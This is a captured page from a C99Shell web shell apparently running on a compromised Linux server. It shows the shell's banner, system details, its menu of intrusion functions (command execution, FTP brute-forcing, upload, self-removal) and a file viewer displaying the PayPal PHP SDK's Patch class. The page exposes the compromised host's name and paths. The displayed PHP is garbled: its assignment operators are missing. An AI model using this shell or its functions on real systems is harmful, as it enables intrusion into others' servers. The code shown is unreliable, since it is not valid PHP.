!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.76 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Patch.php (2.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class Patch
 *
 * A JSON patch object that you can use to apply partial updates to resources.
 *
 * @package PayPal\Api
 *
 * @property string op
 * @property string path
 * @property mixed value
 * @property string from
 */
class Patch extends PayPalModel
{
    
/**
     * The operation to perform.
     * Valid Values: ["add", "remove", "replace", "move", "copy", "test"]
     *
     * @param string $op
     * 
     * @return $this
     */
    
public function setOp($op)
    {
        
$this->op $op;
        return 
$this;
    }

    
/**
     * The operation to perform.
     *
     * @return string
     */
    
public function getOp()
    {
        return 
$this->op;
    }

    
/**
     * A JSON pointer that references a location in the target document where the operation is performed. A `string` value.
     *
     * @param string $path
     * 
     * @return $this
     */
    
public function setPath($path)
    {
        
$this->path $path;
        return 
$this;
    }

    
/**
     * A JSON pointer that references a location in the target document where the operation is performed. A `string` value.
     *
     * @return string
     */
    
public function getPath()
    {
        return 
$this->path;
    }

    
/**
     * New value to apply based on the operation.
     *
     * @param mixed $value
     * 
     * @return $this
     */
    
public function setValue($value)
    {
        
$this->value $value;
        return 
$this;
    }

    
/**
     * New value to apply based on the operation.
     *
     * @return mixed
     */
    
public function getValue()
    {
        return 
$this->value;
    }

    
/**
     * A string containing a JSON Pointer value that references the location in the target document to move the value from.
     *
     * @param string $from
     * 
     * @return $this
     */
    
public function setFrom($from)
    {
        
$this->from $from;
        return 
$this;
    }

    
/**
     * A string containing a JSON Pointer value that references the location in the target document to move the value from.
     *
     * @return string
     */
    
public function getFrom()
    {
        return 
$this->from;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--